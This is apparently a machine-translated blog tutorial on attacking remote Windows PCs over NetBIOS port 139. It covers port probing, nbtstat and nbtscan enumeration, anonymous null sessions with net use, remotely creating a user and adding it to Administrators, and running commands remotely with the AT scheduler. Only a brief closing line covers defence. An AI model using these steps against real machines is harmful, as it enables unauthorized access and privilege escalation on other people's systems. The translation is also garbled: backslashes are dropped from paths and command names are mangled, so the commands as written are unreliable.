This website will show different ways to get as much data as possible to a remote PC using NetBIOS.

The first thing is to check that the computer we want to connect to has the NetBIOS port open, the port is the 139; can be done using the MSDOS conqueue with this command: telnet ADDRESS 139 and if it connects it will have it open and if not, then look for another PC.

The second most important thing is to have the NetBios table, which will tell us which services the remote computer has running that we will check with the results obtained with subsequent commands

With this MSDOS command we will be able to know which services the remote machine is running: nbtstat -A ADDRESS or nbtstat -a PCNAME. Apart from this he will also give us the address MAC In case we are interested.

As we can see in the image, we make a NBTSTAT to an IP or PCNAME and gives us those results, that we compare them with the NetBIOS table and we will get juicy data as your user, to the domain that belongs… and if it were a Domain Controller we would see the services it runs.

To establish what is called Null session, We have to run this command: net use DIRECCIONIPIPC$ “”/u:”” . What this command actually does is authenticate to the remote PC with the user Anonymous.

To authenticate to a remote computer with a specific user: net use ADDRESS /u:USERNAME PASSWORD or net use ADDRESSIPC$ /u:USERNAME PASSWORD or net use ADDRESSIPRESOURCE /u:USERNAME PASSWORD… Once authenticated to the remote host to view the contents of the folder you can do net view ADDRESS and we'll see the content via MSDOS, but you can also do, BEGINNING > EXECUTE and you put whatever you want: ADDRESSIP or IPADDRESS resource and will show you with the Windows Explorer window the content.

View Remote Time: net time ADDRESS
View Available Domains: Net View /Domain
View computers in a specific domain: Net View /Domain:BUJARRA
View the users in a team: Net User
View a user's details: Net User username
Create a user: net user username password /ADD (Ideal for creating a user on a remote PC with the AT command)
Delete a user: net user username /DELETE
View groups on a PC: Net Group
Put a user in a group: net group namegroupusername /ADD (Ideal for grouping Administrators into the user we have created remotely on a PC)
Remove a user from a group: Net Group NameGroup Username /DELETE

Command AT, to run things remotely. With the command en DIRECCIONIP we will see the scheduled tasks that your team has and with the command en DIRECCIONIP 21:30 /INTERACTIVE “MSDOS command to run on the remote PC”. In the previous command, the 21:30 it is the time at which I have set the MSDOS command to be executed that goes in quotation marks, so you can put any time, But first look better at what time it has!

The MS Windows Resource Kit Tool nltest.rar Displays the domain controllers for a particular domain, example:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01

Interesting seriesto the program Nbtscan What he does is a 'nbtstat’ of an entire network at an impressive speed. Example:

C:>nbtscan 192.168.0.0/24
&nbspDoing NBT name scan for addresses from 192.168.0.0/24
&nbspIP address &nbspNetBIOS Server &nbspServer &nbspUser &nbspMAC address
&nbsp—————————————————————————–
&nbsp192.168.0.0 &nbspSendto failed: Cannot assign requested address
&nbsp192.168.0.1 &nbspBUJARRA01 <Server> <unknown> &NBSP00-E0-7D-78-11-E6
&nbsp192.168.0.13 &nbspMARIA <Server> &nbspMARIA &NBSP00-E0-7D-76-5A-2B
&nbsp192.168.0.55 &nbspVICETOPC <Server> &nbspVICETO 00-00-f8-30-fa-23
&nbsp192.168.0.100 &nbspRecvfrom failed: Connection reset by peer

For Protect ourselves of this type of attack we must either close the port 139 on the router, either we will enable the firewall in XP or we will remove the folder and printer sharing service for Microsoft networks (in any S.O. Microsoft's).